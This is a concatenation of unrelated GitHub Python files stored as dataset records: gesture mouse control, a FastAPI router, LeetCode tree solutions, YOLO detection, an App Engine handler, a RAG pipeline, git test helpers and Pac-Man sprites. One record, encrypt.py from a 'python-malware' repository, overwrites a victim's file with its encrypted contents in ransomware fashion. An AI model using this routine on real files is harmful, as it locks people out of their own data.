cv2.rectangle(img,(x1,y1),(x1+w1,y1+h1),(255,0,0),5)\n cv2.rectangle(img,(x2,y2),(x2+w2,y2+h2),(255,0,0),5)\n #centre coordinate of first object\n cx1=x1+w1//2\n cy1=y1+h1//2\n\n cx2=x2+w2//2\n cy2=y2+h2//2\n\n #drawing line\n cv2.line(img,(cx1,cy1),(cx2,cy2),(0,255,0),3)\n\n cx=(cx1+cx2)//2\n cy=(cy1+cy2)//2\n #cx,cy=cx1,cy1\n\n\n # Drawing the point (red dot) \n cv2.circle(img, (cx,cy),2,(0,0,255),2)\n #adding the pointer\n \n\n (mold0,mold1)=(sx-(cx*sx/camx), cy*sy/camy)\n #mloc0=(cx-mold0)*0.5\n #mloc1=(cy-mold1)*0.5\n #mloc0,mloc1=mold0*0.8,mold1*0.8\n #mouse.release(Button.left)\n #mouse.release(Button.left)\n\n\n\n if hold:\n hold=False\n mouse.release(Button.left)\n end=time.time()\n print(\"end - start =\",end-start)\n if 0.08<=end-start<=2:\n\n mouse.press(Button.left)\n mouse.release(Button.left)\n mouse.press(Button.left)\n mouse.release(Button.left)\n\n mouse.position=(mold0*0.8,mold1*0.8)\n\n \n \n elif n==1 and firstClick:\n\n x1, y1, w1, h1 = cv2.boundingRect(sconts[0])\n cv2.rectangle(img, (x1, y1), (x1 + w1, y1 + h1), (255, 0, 0), 5)\n (cx,cy)=(x1+w1//2,y1+h1//2)\n if not hold:\n #mouse.press(Button.left)\n #mouse.release(Button.left)\n mouse.press(Button.left)\n start=time.time()\n hold=True\n #mouse.release(Button.left)\n #mouse.press(Button.left)\n (posx,posy)=(sx-(cx*sx/camx), cy*sy/camy)\n mouse.position=(posx*0.8,posy*0.8)\n #mouse.release(Button.left)\n\n\n\n\n cv2.imshow('from cam',img)\n \n key=cv2.waitKey(5)\n if key==ord('q'):\n cv2.destroyAllWindows()\n break\ncam.release()\n","repo_name":"sdmars/pypro","sub_path":"gesture_controlled_mouse_final.py","file_name":"gesture_controlled_mouse_final.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"33893283590","text":"from app.auth import check_is_admin, get_user\nfrom app.controllers.users import UserController\nfrom app.database import get_session\nfrom app.schemas.users import User, UserCreate, UserUpdate\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom typing import List\nfrom uuid import UUID\n\n\nrouter = APIRouter()\n\n\n@router.get('/', response_model=List[User])\nasync def get_users(\n user: User = Depends(get_user),\n db: Session = Depends(get_session)\n) -> List[User]:\n \"\"\"\n Get users list\n \"\"\"\n return UserController.get_users(db)\n\n\n@router.get('/{user_id}', response_model=User)\n# named read_user so it does not shadow the get_user auth dependency imported above\nasync def read_user(\n user_id: UUID,\n db: Session = Depends(get_session)\n) -> User:\n \"\"\"\n Get user\n \"\"\"\n return UserController.get_user(db, user_id)\n\n\n@router.delete('/{user_id}')\nasync def delete_user(\n user_id: UUID,\n user: User = Depends(get_user),\n db: Session = Depends(get_session)\n) -> None:\n \"\"\"\n Delete user\n \"\"\"\n check_is_admin(user)\n return UserController.delete_user(db, user_id)\n","repo_name":"rclsilver/face-recognition","sub_path":"server/app/routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}{"seq_id":"23775249491","text":"'''\n1302. 
Deepest Leaves Sum\nMedium\n\nGiven the root of a binary tree, return the sum of values of its deepest leaves.\n \n\nExample 1:\n\n\nInput: root = [1,2,3,4,5,null,6,7,null,null,null,null,8]\nOutput: 15\nExample 2:\n\nInput: root = [6,7,8,2,7,1,3,9,null,1,4,null,null,null,5]\nOutput: 19\n \n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 10^4].\n1 <= Node.val <= 100\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n#bfs\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n q = [root]\n while q:\n s = sum(n.val for n in q)\n q = [c for n in q for c in [n.left, n.right] if c]\n return s\n\n#bfs\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n q = [root]\n while q:\n pre, q = q, [c for n in q for c in [n.left, n.right] if c]\n return sum(n.val for n in pre)\n\n#dfs\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n self.s = 0\n self.max_level = 0\n \n def dfs(node, level):\n if not node: return\n \n if level == self.max_level:\n self.s += node.val\n elif level > self.max_level:\n self.s = node.val\n self.max_level = level\n \n dfs(node.left, level+1)\n dfs(node.right, level+1)\n \n dfs(root, 0)\n return self.s","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2022/05. May/15.deepestLeavesSum.py","file_name":"15.deepestLeavesSum.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"39185740229","text":"# import the necessary packages\nimport numpy as np\nimport cv2\n\n# define file path\nyolo_path = \"yolo-coco/\"\nimage_path = \"images/\"\n\n\n# load the COCO class labels\nlabels_path = yolo_path + \"coco.names\"\nlabels = open(labels_path).read().strip().split(\"\\n\")\n\n\nweights_path = yolo_path + \"yolov3.weights\"\nconfig_path = yolo_path + \"yolov3.cfg\"\nnet = cv2.dnn.readNetFromDarknet(config_path, weights_path)\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n\nimage = cv2.imread(\"images/football.jpg\")\n(H, W) = image.shape[:2]\n\n\nblob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416), swapRB=True, crop=False)\nnet.setInput(blob)\nlayerOutputs = net.forward(ln)\n\n\nboxes = []\nconfidences = []\nclassIDs = []\n\n\nfor output in layerOutputs:\n\tfor detection in output:\n\t\tscores = detection[5:]\n\t\tclassID = np.argmax(scores)\n\t\tconfidence = scores[classID] \n\t\tif confidence > 0.50:\n\t\t\tbox = detection[0:4] * np.array([W, H, W, H])\n\t\t\t(centerX, centerY, width, height) = box.astype(\"int\")\n\t\t\tx = int(centerX - (width / 2))\n\t\t\ty = int(centerY - (height / 2))\n\t\t\tboxes.append([x, y, int(width), int(height)])\n\t\t\tconfidences.append(float(confidence))\n\t\t\tclassIDs.append(classID)\n \n\nidxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)\nif len(idxs) > 0:\n\tfor i in idxs.flatten():\n\t\t(x, y) = (boxes[i][0], boxes[i][1])\n\t\t(w, h) = (boxes[i][2], boxes[i][3])\n\n\t\tcv2.rectangle(image, (x, y), (x + w, y + h), (0,255,255), 2)\n\t\ttext = \"{}: {:.2f}\".format(labels[classIDs[i]], 
confidences[i])\n\t\tcv2.putText(image, text, (x, y - 7), cv2.FONT_HERSHEY_SIMPLEX, \n 0.5, (0,255,255), 2)\n\ncv2.imshow(\"Output\", image)\n# wait for a key press so the window stays open\ncv2.waitKey(0)\n","repo_name":"Furkan-Gulsen/Object-Detection-with-YOLO","sub_path":"yolo_for_image.py","file_name":"yolo_for_image.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"23923043379","text":"import os\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nimport datetime\n\nfrom python.data import *\n\n\nclass GetGamesForTourney(webapp.RequestHandler):\n\tdef post(self):\n\t\ttk = db.Key(self.request.get('tournamentKey'))\n\t\ttournament = db.get(tk)\n\t\t\n\t\ttemplate_values = {\n\t\t\t\t\t\t\t\"tournament\":tournament\n\t\t\t\t\t\t\t}\n\t\tpath = os.path.join(os.path.dirname(__file__), '../xml/lists/game.xml')\n\t\tself.response.out.write(template.render(path, template_values))\n\t\t\n\t\t\nclass GetTeamsForTourney(webapp.RequestHandler):\n\tdef post(self):\n\t\ttk = db.Key(self.request.get('tournamentKey'))\n\t\tdk = db.Key(self.request.get('divisionKey'))\n\t\tck = db.Key(self.request.get('countryKey'))\n\t\tteams = db.GqlQuery(\"SELECT * FROM Team WHERE tournament = :1 AND division = :2 AND country = :3\", tk, dk, ck)\n\t\ttemplate_values = {\n\t\t\t\t\t\t\t\"teams\":teams\n\t\t\t\t\t\t\t}\n\t\tpath = os.path.join(os.path.dirname(__file__), '../xml/lists/team.xml')\n\t\tself.response.out.write(template.render(path, template_values))\n\nclass NewGame(webapp.RequestHandler):\n\tdef post(self):\n\t\tgame = Game()\n\t\tgame.tournament = db.Key(self.request.get('tournamentKey'))\n\t\tdateString = self.request.get('gameDate')\n\t\tgame.startDate = datetime.datetime.strptime(dateString, '%d-%m-%Y').date()\n\t\tgame.division = db.Key(self.request.get('gameDivision'))\n\t\tgame.gameType = db.Key(self.request.get('gameType'))\n\t\tif self.request.get('testMatch') == 'true':\n\t\t\tgame.testMatch = True\n\t\telse:\n\t\t\tgame.testMatch = False\n\t\tgame.put()\n\t\t\n\t\t#Process Black Team\n\t\tbCountry = db.Key(self.request.get('bCountry'))\n\t\tbDivision = db.Key(self.request.get('bDivision'))\n\t\tbTeams = db.GqlQuery(\"SELECT * FROM Team WHERE tournament = :1 AND division = :2 AND country = :3\", game.tournament, bDivision, bCountry)\n\t\tif bTeams.count() > 1:\n\t\t\t#ask which team\n\t\t\tself.response.out.write('More than one black team')\n\t\telif bTeams.count() > 0:\n\t\t\t#one team\n\t\t\tbgt = GameTeam()\n\t\t\tbgt.team = bTeams.get()\n\t\t\tbgt.score = int(self.request.get('bscore'))\n\t\t\tbgt.colour = 'black'\n\t\t\tbgt.game = game\n\t\t\tbgt.put()\n\n\t\telse:\n\t\t\t#no team\n\t\t\tbt = Team()\n\t\t\tbt.country = bCountry\n\t\t\tbt.tournament = game.tournament\n\t\t\tbt.division = bDivision\n\t\t\tbt.put()\n\t\t\t\n\t\t\tbgt = GameTeam()\n\t\t\tbgt.team = bt\t#use the newly created team (the query returned no results)\n\t\t\tbgt.score = int(self.request.get('bscore'))\n\t\t\tbgt.colour = 'black'\n\t\t\tbgt.game = game\n\t\t\tbgt.put()\n\n\t\t\n\t\t#Process White Team\n\t\twCountry = db.Key(self.request.get('wCountry'))\n\t\twDivision = db.Key(self.request.get('wDivision'))\n\t\twTeams = db.GqlQuery(\"SELECT * FROM Team WHERE tournament = :1 AND division = :2 AND country = :3\", game.tournament, wDivision, wCountry)\n\t\tif wTeams.count() > 1:\n\t\t\tself.response.out.write('More than one white team')\n\t\telif 
wTeams.count() > 0:\n\t\t\t#one team\n\t\t\twgt = GameTeam()\n\t\t\twgt.team = wTeams.get()\n\t\t\twgt.score = int(self.request.get('wscore'))\n\t\t\twgt.colour = 'white'\n\t\t\twgt.game = game\n\t\t\twgt.put()\n\t\telse:\n\t\t\t#no team\n\t\t\twt = Team()\n\t\t\twt.country = wCountry\n\t\t\twt.tournament = game.tournament\n\t\t\twt.division = wDivision\n\t\t\twt.put()\n\t\t\t\n\t\t\twgt = GameTeam()\n\t\t\twgt.team = wt\t#use the newly created team (the query returned no results)\n\t\t\twgt.score = int(self.request.get('wscore'))\n\t\t\twgt.colour = 'white'\n\t\t\twgt.game = game\n\t\t\twgt.put()\n\t\t\n\t\tself.response.out.write('Made it to here')\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bentilly/UWH-Heroes","sub_path":"uwhheroes.appspot/python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"4277284918","text":"from src.helper.hashing import *\r\n\r\ndef encrypt(file_path: str):\r\n \"\"\"\r\n Use this to encrypt the victim's file.\r\n \"\"\"\r\n key = load_key()\r\n f = Fernet(key)\r\n myFileText = \"\"\r\n with open(file_path, \"rb\") as file:\r\n myFileText = file.read()\r\n \r\n with open(file_path, \"wb\") as file:\r\n file.write(f.encrypt(myFileText))\r\n","repo_name":"YasharHTML/python-malware","sub_path":"src/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74150781992","text":"import time\nimport os\nimport pandas as pd\nimport numpy as np\nimport openai\nimport torch\nfrom torch.nn import functional as F\nfrom sentence_transformers import SentenceTransformer\n\nfrom dotenv import load_dotenv, find_dotenv\n_ = load_dotenv(find_dotenv())\nfrom huggingface_hub import login\nfrom milvus import default_server\nfrom pymilvus import (\n connections, utility\n)\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.vectorstores import Milvus\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.document_loaders import PyPDFLoader\nfrom transformers import AutoModelForQuestionAnswering, AutoTokenizer, pipeline\n\ndefault_server.stop()\ndefault_server.cleanup()\n\nstart_time = time.time()\ndefault_server.start() \nend_time = time.time()\nprint(f\"Milvus server startup time: {end_time - start_time} sec\")\n\ntime.sleep(15) \nconnections.connect(host='127.0.0.1', \n port=default_server.listen_port,\n show_startup_banner=True)\nprint(utility.get_server_version()) \n\ntorch.backends.cudnn.deterministic = True\nRANDOM_SEED = 413\ntorch.manual_seed(RANDOM_SEED)\nDEVICE = torch.device('cuda:3' if torch.cuda.is_available() else 'cpu')\nprint(f\"device: {DEVICE}\")\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\nhub_token = os.getenv(\"HUGGINGFACEHUB_API_TOKEN\")\nlogin(token=hub_token)\nmodel_name = \"BAAI/bge-base-en-v1.5\"\nretriever = SentenceTransformer(model_name, device=DEVICE)\nprint(type(retriever))\nprint(retriever)\n\nMAX_SEQ_LENGTH = retriever.get_max_seq_length() \nHF_EOS_TOKEN_LENGTH = 1\nEMBEDDING_LENGTH = retriever.get_sentence_embedding_dimension()\nprint(f\"model_name: {model_name}\")\nprint(f\"EMBEDDING_LENGTH: {EMBEDDING_LENGTH}\")\nprint(f\"MAX_SEQ_LENGTH: {MAX_SEQ_LENGTH}\")\n\nmodel_kwargs = {\"device\": DEVICE}\nencode_kwargs = {'normalize_embeddings': True}\nlc_encoder = HuggingFaceEmbeddings(\n model_name=model_name,\n model_kwargs=model_kwargs,\n 
encode_kwargs=encode_kwargs\n)\ntype(lc_encoder)\n\nfile_path1 = \"/Users/gracesodunke/Documents/Google STEP/LONDON Grace Ayomide Sodunke_Offer Letter_463737234_1688056780235.pdf\"\nfile_path2 = \"/Users/gracesodunke/Documents/Google STEP/Grace Ayomide Sodunke_Offer Letter_463737234_1683043578334_20230509-1541.pdf\" \n\nMILVUS_PORT = 19530\nMILVUS_HOST = \"127.0.0.1\"\n\nvector_store = Milvus(\n collection_name=\"Collection3\",\n embedding_function=lc_encoder,\n connection_args={\"host\": MILVUS_HOST, \"port\": MILVUS_PORT},\n)\n\ndef upload_document(pdf_path: str):\n loader = PyPDFLoader(pdf_path)\n pages = loader.load()\n chunk_size = MAX_SEQ_LENGTH - HF_EOS_TOKEN_LENGTH\n chunk_overlap = np.round(chunk_size * 0.10, 0)\n start_time = time.time()\n text_splitter = RecursiveCharacterTextSplitter(\n chunk_size = chunk_size,\n chunk_overlap = chunk_overlap,\n length_function = len,\n )\n chunks = text_splitter.create_documents(\n [p.page_content for p in pages], \n metadatas=[{\"name\": pdf_path} for p in pages])\n end_time = time.time()\n print(f\"chunking time: {end_time - start_time}\")\n print(f\"type: {type(chunks)}, len: {len(chunks)}, type: {type(chunks[0])}\")\n print(f\"type: list of {type(chunks[0])}, len: {len(chunks)}\") \n\n print()\n print(\"Looking at a sample chunk...\")\n print(chunks[0].metadata)\n print(chunks[0].page_content)\n\n print(\"Start inserting entities\")\n start_time = time.time()\n vector_store.add_documents(chunks)\n end_time = time.time()\n print(f\"LlamaIndex Milvus insert time for {len(chunks)} vectors: {end_time - start_time} seconds\")\n print(f\"type: {type(vector_store)}\")\n\nupload_document(file_path1)\nupload_document(file_path2)\n\nquestion = 'What is the salary per annum?'\nquery = [question]\nQUERY_LENGTH = len(query[0])\nprint(f\"query length: {QUERY_LENGTH}\")\n# METADATA_URL = \"\"\n# SEARCH_PARAMS = dict({\n# \"expr\": \"text = METADATA_URL\",\n# })\nstart_time = time.time()\ndocs = vector_store.similarity_search(\n question,\n k=4,\n param=None,\n verbose=True,\n )\nend_time = time.time()\nprint(f\"Milvus query time: {end_time - start_time}\")\nfor d in docs:\n print(d.metadata)\n print(d.page_content[:100])\nprint(f\"Count raw retrievals: {len(docs)}\")\n\nunique_sources = []\nunique_texts = []\nfor doc in docs:\n if doc.page_content not in unique_texts:\n unique_texts.append(doc.page_content)\n unique_sources.append(doc.metadata)\nprint(f\"Count unique texts: {len(unique_texts)}\")\n#[ print(text) for text in unique_texts ]\n\nformatted_context = list(zip(unique_sources, unique_texts))\ncontext = \"\"\nfor source, text in formatted_context:\n context += f\"{text} \"\nprint(len(context))\n\np = f\"\"\"You are a helpful and knowledgeable agent. To achieve your goal of answering a query\n correctly, you have access to contextual information. 
You are given a query and must produce a concise summary\n of maximum 500 words that uses the relevant information from the context, given in a grammatically correct and\n readable format.\n\n Query: {query}\n Context: {context}\n Your answer: \"\"\"\n# ChatCompletion expects a messages list, not a prompt string\nresult = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-16k\",\n messages=[{\"role\": \"user\", \"content\": p}],\n max_tokens=1000,\n temperature=0\n )\nanswer = result['choices'][0]['message']['content'].lstrip('\\n')\n\nprint(answer)\n\ndef query_search(question):\n query = [question]\n QUERY_LENGTH = len(query[0])\n print(f\"query length: {QUERY_LENGTH}\")\n start_time = time.time()\n docs = vector_store.similarity_search(\n question,\n k=4,\n param=None,\n verbose=True,\n )\n end_time = time.time()\n print(f\"Milvus query time: {end_time - start_time}\")\n for d in docs:\n print(d.metadata)\n print(d.page_content[:100])\n print(f\"Count raw retrievals: {len(docs)}\")\n\n unique_sources = []\n unique_texts = []\n for doc in docs:\n if doc.page_content not in unique_texts:\n unique_texts.append(doc.page_content)\n unique_sources.append(doc.metadata)\n print(f\"Count unique texts: {len(unique_texts)}\")\n formatted_context = list(zip(unique_sources, unique_texts))\n context = \"\"\n for source, text in formatted_context:\n context += f\"{text} \"\n print(len(context))\n\n p = f\"\"\"You are a helpful and knowledgeable agent. To achieve your goal of answering a query\n correctly, you have access to contextual information. You are given a query and must produce a concise summary\n of maximum 500 words that uses the relevant information from the context, given in a grammatically correct and\n readable format.\n\n Query: {query}\n Context: {context}\n Your answer: \"\"\"\n # chat models must go through the ChatCompletion endpoint\n result = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-16k\",\n messages=[{\"role\": \"user\", \"content\": p}],\n max_tokens=1000,\n temperature=0\n )\n answer = result['choices'][0]['message']['content'].lstrip('\\n')\n\n print(answer)\n return {\"summary\": answer}\n\n#def practice_topic","repo_name":"grace-sodunke/ScholarSearch","sub_path":"app/rag_gpt4_api.py","file_name":"rag_gpt4_api.py","file_ext":"py","file_size_in_byte":6880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"72581167274","text":"import os\nimport shutil\n\nfrom mixin_git import (\n GitMixin,\n GitRepository,\n )\nimport testutils\n\n\nclass ScriptsRepoMixin(GitMixin):\n '''\n A mixin used to represent a git repository which contains the clang-format-related scripts.\n\n How the scripts end up in the repo is decided by derived classes.\n By using classes derived from this mixin, you can get your tests to run in various\n configurations.\n '''\n\n def __init__(self, *args, **kwargs):\n super(ScriptsRepoMixin, self).__init__(*args, **kwargs)\n\n self.repo = None\n self.scripts_dir = None\n\n def setUp(self):\n super(ScriptsRepoMixin, self).setUp()\n\n assert not self.repo\n assert not self.scripts_dir\n\n # This class's config_repo doesn't return, but the derived ones do.\n self.repo = self.config_repo() # pylint: disable=assignment-from-no-return\n\n assert self.repo\n\n # In case we cloned the current repo but there's unstaged content.\n self.update_scripts()\n\n def update_scripts(self):\n '''\n Overwrite the scripts in the repo with the current version (including uncommitted changes).\n '''\n assert self.repo\n\n src_dir = self.this_repo_path()\n with self.repo.work_dir():\n if self.scripts_dir:\n testutils.makedirs(self.scripts_dir)\n shutil.copy(os.path.join(src_dir, 'apply-format'), self.apply_format_path)\n 
shutil.copy(os.path.join(src_dir, 'git-pre-commit-format'), self.pre_commit_hook_path)\n\n def tearDown(self):\n super(ScriptsRepoMixin, self).tearDown()\n\n self.repo = None\n self.scripts_dir = None\n\n def config_repo(self):\n '''\n Configure a git repository containing the scripts.\n\n Derived classes need to overwrite this.\n\n If the derived class puts the script in a subdirectory, then it should set\n `self.scripts_dir` to the relative path of the subdirectory.\n\n Return value:\n The newly configured GitRepository instance.\n '''\n assert not self.repo\n raise Exception('This method needs to be overwritten by derived classes.')\n\n def _get_script_path(self, script_name):\n if self.scripts_dir:\n return os.path.join(self.scripts_dir, script_name)\n\n return script_name\n\n @property\n def apply_format_path(self):\n '''\n The path of the apply-format script, relative to the repository top level dir.\n '''\n return self._get_script_path('apply-format')\n\n @property\n def pre_commit_hook_path(self):\n '''\n The path of the git pre-commit hook script, relative to the repository top level dir.\n '''\n return self._get_script_path('git-pre-commit-format')\n\n def write_style(self, style_dict):\n content_list = ['{}: {}'.format(k, v) for k, v in style_dict.items()]\n content = '\\n'.join(content_list)\n self.repo.write_file('.clang-format', content)\n\n\nclass ScriptsWorkTreeRepoMixin(ScriptsRepoMixin):\n '''\n A mixin used to represent a git repository which uses work trees.\n\n How the scripts end up in the repo is decided by derived classes.\n By using classes derived from this mixin, you can get your tests to run in various\n configurations.\n '''\n\n def setUp(self):\n super(ScriptsWorkTreeRepoMixin, self).setUp()\n\n # Now the repo should be set up, but we create an alternative worktree dir\n # and use that one instead of the main one.\n\n assert self.repo\n\n # checkout -f in case there are modified scripts (copied by update_scripts).\n # We will re-update the scripts anyway later.\n self.repo.git_check_output('checkout', '-f')\n\n # We don't know on which branch we are. 
It could be master, a work branch\n # or some branch created by GitHub.\n # We need a branch to use for the worktree and a different one on which\n # the old repo should be, so we just create two.\n worktree_branch = 'other-for-worktree'\n self.repo.git_check_output('checkout', '-b', worktree_branch)\n main_repo_branch = 'main-repo'\n self.repo.git_check_output('checkout', '-b', main_repo_branch)\n\n worktree_branch_path = os.path.join(self.make_tmp_sub_dir(),\n 'worktree-dir-for-branch--' + worktree_branch)\n self.repo.git_check_output('worktree', 'add', worktree_branch_path, worktree_branch)\n\n self.repo = GitRepository(worktree_branch_path)\n\n # The new module may have submodules, make sure they are synced.\n self.repo.git_check_output('submodule', 'update', '--init', '--recursive')\n\n # In case we cloned the current repo but there's unstaged content.\n self.update_scripts()\n\n\nclass CloneRepoMixin():\n '''\n A mixin representing a git repository cloned from this git repository.\n '''\n\n def config_repo(self):\n self.scripts_dir = '.'\n return self.clone_this_repo()\n\n def clone_this_repo(self):\n return self.clone_repo(self.this_repo_path())\n\n\nclass SubmoduleMixin():\n '''\n A mixin representing a git repository in which this git repository is added as a submodule.\n '''\n\n SUBMODULE_DIR = 'submodule'\n\n def config_repo(self):\n self.scripts_dir = self.SUBMODULE_DIR\n return self.new_repo_with_submodule()\n\n def new_repo_with_submodule(self):\n repo = self.new_repo()\n repo.git_check_output('submodule', 'add', self.this_repo_path(), self.SUBMODULE_DIR)\n repo.commit()\n return repo\n\n\nclass CopiedFilesMixin():\n '''\n A mixin representing a git repository in which the scripts from this git repository are\n directly copied.\n '''\n\n SCRIPTS_DIR = os.path.join('foo', 'bar', 'scripts')\n\n def config_repo(self):\n self.scripts_dir = self.SCRIPTS_DIR\n return self.new_repo_with_copied_scripts()\n\n def new_repo_with_copied_scripts(self):\n # The scripts will be copied by self.update_scripts.\n return self.new_repo()\n","repo_name":"barisione/clang-format-hooks","sub_path":"tests/mixin_scripts_repo.py","file_name":"mixin_scripts_repo.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"72"}
+{"seq_id":"17428396331","text":"import pygame\nfrom pygame.sprite import Sprite\n\n\nclass PortalBullet(Sprite):\n def __init__(self, ai_settings, screen, spritesheet2, pacman):\n super(PortalBullet, self).__init__()\n self.ai_settings = ai_settings\n self.screen = screen\n\n self.imagerects = ((69, 42, 5, 5), (82, 42, 5, 5), (76, 39, 5, 5), (77, 45, 5, 5),\n (37, 43, 5, 5), (52, 41, 5, 5), (43, 36, 6, 6), (44, 44, 6, 6))\n self.images = spritesheet2.images_at(self.imagerects, colorkey=(0, 0, 0))\n self.current_image = None\n\n self.rect = self.images[0].get_rect()\n\n self.speed = ai_settings.bullet_speed\n self.direction = pacman.direction\n self.portal_switch = pacman.portal_switch\n self.pacman_rect = pacman.rect\n\n self.initialize_bullet()\n\n def initialize_bullet(self):\n if self.direction == 0:\n self.rect.right = self.pacman_rect.left\n self.rect.centery = self.pacman_rect.centery\n if not self.portal_switch:\n self.current_image = self.images[0]\n else:\n self.current_image = self.images[4]\n elif self.direction == 1:\n self.rect.left = self.pacman_rect.right\n self.rect.centery = self.pacman_rect.centery\n if not self.portal_switch:\n self.current_image = self.images[1]\n else:\n 
self.current_image = self.images[5]\n elif self.direction == 2:\n self.rect.bottom = self.pacman_rect.top\n self.rect.centerx = self.pacman_rect.centerx\n if not self.portal_switch:\n self.current_image = self.images[2]\n else:\n self.current_image = self.images[6]\n elif self.direction == 3:\n self.rect.top = self.pacman_rect.bottom\n self.rect.centerx = self.pacman_rect.centerx\n if not self.portal_switch:\n self.current_image = self.images[3]\n else:\n self.current_image = self.images[7]\n\n def draw(self):\n self.screen.blit(self.current_image, self.rect)\n\n def update_bullet(self):\n if self.direction == 0:\n self.rect.x -= self.speed\n elif self.direction == 1:\n self.rect.x += self.speed\n elif self.direction == 2:\n self.rect.y -= self.speed\n elif self.direction == 3:\n self.rect.y += self.speed\n\n def regress(self):\n if self.direction == 0:\n self.rect.x += 1\n elif self.direction == 1:\n self.rect.x -= 1\n elif self.direction == 2:\n self.rect.y += 1\n elif self.direction == 3:\n self.rect.y -= 1\n\n\nclass Portal(Sprite):\n def __init__(self, ai_settings, screen, spritesheet2):\n super(Portal, self).__init__()\n self.ai_settings = ai_settings\n self.screen = screen\n\n self.imagerects1 = ((42, 0, 10, 30), (12, 0, 9, 30))\n self.imagerects2 = ((0, 40, 33, 15), (66, 10, 28, 11))\n self.images = spritesheet2.images_at(self.imagerects1, colorkey=(0, 0, 0))\n self.images.extend(spritesheet2.images_at(self.imagerects2, colorkey=(0, 0, 0)))\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n self.rect.x -= self.rect.width\n self.portal_direction = None\n\n self.portal_active = False\n self.expiration_time = 0\n\n def initialize_portal(self, bullet, portal_switch):\n if bullet.direction == 0 or bullet.direction == 1:\n if not portal_switch:\n self.image = self.images[0]\n else:\n self.image = self.images[1]\n self.rect = self.image.get_rect()\n if bullet.direction == 0:\n self.portal_direction = 1\n self.rect.right = bullet.rect.left\n else:\n self.portal_direction = 0\n self.rect.left = bullet.rect.right\n self.rect.centery = bullet.rect.centery\n if bullet.direction == 2 or bullet.direction == 3:\n if not portal_switch:\n self.image = self.images[2]\n else:\n self.image = self.images[3]\n self.rect = self.image.get_rect()\n if bullet.direction == 2:\n self.portal_direction = 3\n self.rect.bottom = bullet.rect.top\n else:\n self.portal_direction = 2\n self.rect.top = bullet.rect.bottom\n self.rect.centerx = bullet.rect.centerx\n self.portal_active = True\n self.expiration_time = 0\n\n def draw(self):\n self.screen.blit(self.image, self.rect)\n\n def reset_portal(self, pacman):\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n self.rect.x -= self.rect.width\n self.portal_direction = None\n self.portal_active = False\n self.expiration_time = 0\n pacman.portals_active = False\n\n def expire_portal(self, pacman):\n if self.portal_active:\n self.expiration_time += 1\n if self.expiration_time == 60 * 10:\n self.reset_portal(pacman)\n\n\nclass SidePortals:\n def __init__(self, ai_settings, screen):\n self.ai_settings = ai_settings\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n self.left_x = self.screen_rect.centerx - self.ai_settings.block_width * 30.5\n self.right_x = self.screen_rect.centerx + self.ai_settings.block_width * 27.5\n self.y = self.ai_settings.block_height * 27 + self.ai_settings.screen_height * 1/8 + 1\n self.left_rect = pygame.Rect(self.left_x, self.y, ai_settings.entity_width, ai_settings.entity_height)\n 
self.right_rect = pygame.Rect(self.right_x, self.y, ai_settings.entity_width, ai_settings.entity_height)\n self.color = (0, 0, 0)\n\n def draw(self):\n self.screen.fill(self.color, self.left_rect)\n self.screen.fill(self.color, self.right_rect)\n\n def transport(self, entity):\n if entity.rect.left <= self.left_rect.left:\n entity.rect.right = self.right_rect.right - 1\n elif entity.rect.right >= self.right_rect.right:\n entity.rect.left = self.left_rect.left + 1\n","repo_name":"zippi100/PacMan","sub_path":"venv/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
